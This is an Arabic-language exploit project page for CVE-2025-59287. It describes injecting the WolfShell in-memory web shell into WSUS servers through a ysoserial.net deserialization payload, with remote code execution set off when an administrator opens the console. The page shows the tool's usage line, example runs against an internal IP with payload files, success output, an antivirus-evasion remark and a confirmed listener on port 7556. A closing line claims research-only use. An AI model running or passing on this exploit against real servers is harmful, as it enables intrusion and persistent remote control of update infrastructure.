
استغلال لثغرة CVE-2025-59287، يقوم بحقن قشرة ويب الذاكرة WolfShell في خوادم WSUS لتحقيق تنفيذ التعليمات البرمجية عن بُعد عند فتح وحدة التحكم الإدارية.
CVE-2025-59287 — حقن WolfShell وولف شيل حصان طروادة الذاكري الموجّه (Forward Memory Shell)
تستغل ثغرة CVE-2025-59287 خللاً منطقياً في المكونات المرتبطة بـ WSUS لحقن حصان طروادة الذاكري WolfShell في الخادم المستهدف. عند فتح المسؤول لوحة تحكم WSUS (يتم التشغيل تلقائياً خلال فترة عشوائية تتراوح بين 1-30 دقيقة افتراضياً)، يتم تفعيل الحصان الذاكري مما يؤدي إلى تنفيذ أوامر عن بُعد (RCE). تحتوي هذه الوثيقة على أمثلة للاستغلال والملفات المطلوبة وتوصيات الحماية.
إرسال حمولة ysoserial.net الخاصة بإلغاء التسلسل إلى الخادم المستهدف، مع وظائف قابلة للتخصيص، ويعرض هذا المشروع حقن حصان طروادة الذاكري وولف شيل
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

يقوم Windows Defender على Win2019 بالحظر والفحص، ولا يمكن استخدامه

كما هو موضح في الصورة، تم الاستماع بنجاح إلى المنفذ 7556، مما يؤكد أن حصان WolfShell الذاكري الموجّه قد تم حقنه


هذه الوثيقة مخصصة لأغراض البحث الأمني والحماية فقط. يرجى عدم استخدام كود الاستغلال ذي الصلة ضد أنظمة غير مصرح بها أو في أنشطة هجومية.